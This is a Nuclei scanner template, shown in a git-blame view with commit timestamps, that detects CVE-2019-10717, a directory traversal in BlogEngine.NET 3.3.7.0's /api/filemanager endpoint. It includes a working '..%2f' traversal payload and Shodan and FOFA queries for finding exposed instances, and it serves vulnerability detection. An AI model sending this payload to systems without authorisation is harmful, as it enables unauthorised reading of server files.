2022-08-01 07:58:09 +00:00
|
|
|
id: CVE-2019-10717
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
|
2022-08-01 07:58:09 +00:00
|
|
|
author: arafatansari
|
2022-08-01 11:02:39 +00:00
|
|
|
severity: high
|
2022-08-01 07:58:09 +00:00
|
|
|
description: |
|
2022-08-05 13:57:51 +00:00
|
|
|
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
|
2022-08-01 07:58:09 +00:00
|
|
|
reference:
|
|
|
|
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
|
2022-08-02 09:47:48 +00:00
|
|
|
- https://github.com/rxtur/BlogEngine.NET/commits/master
|
2022-08-05 13:57:51 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-10717
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://seclists.org/fulldisclosure/2019/Jun/44
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
2022-08-02 09:47:48 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
|
|
|
|
cvss-score: 7.1
|
|
|
|
cve-id: CVE-2019-10717
|
|
|
|
cwe-id: CWE-22
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.00351
|
|
|
|
epss-percentile: 0.71813
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:*
|
2022-08-01 07:58:09 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:53:28 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: dotnetblogengine
|
|
|
|
product: blogengine.net
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- http.html:"Blogengine.net"
|
|
|
|
- http.html:"blogengine.net"
|
2024-05-31 19:23:20 +00:00
|
|
|
fofa-query: body="blogengine.net"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine
|
2022-08-01 07:58:09 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-01 11:02:39 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"
|
2022-08-01 07:58:09 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-08-02 09:10:56 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
|
|
|
|
|
2022-08-01 11:02:39 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4b0a0048304602210086bd22735af01bfd411ee905481a3dc6f43f7656c98464c581d7197355312719022100a746f75f698fb3b2dd2130fbfc5d001012bc61a5f8946d5e2c8b2e80abff19fc:922c64590222798bb761d5b6d8e72950
|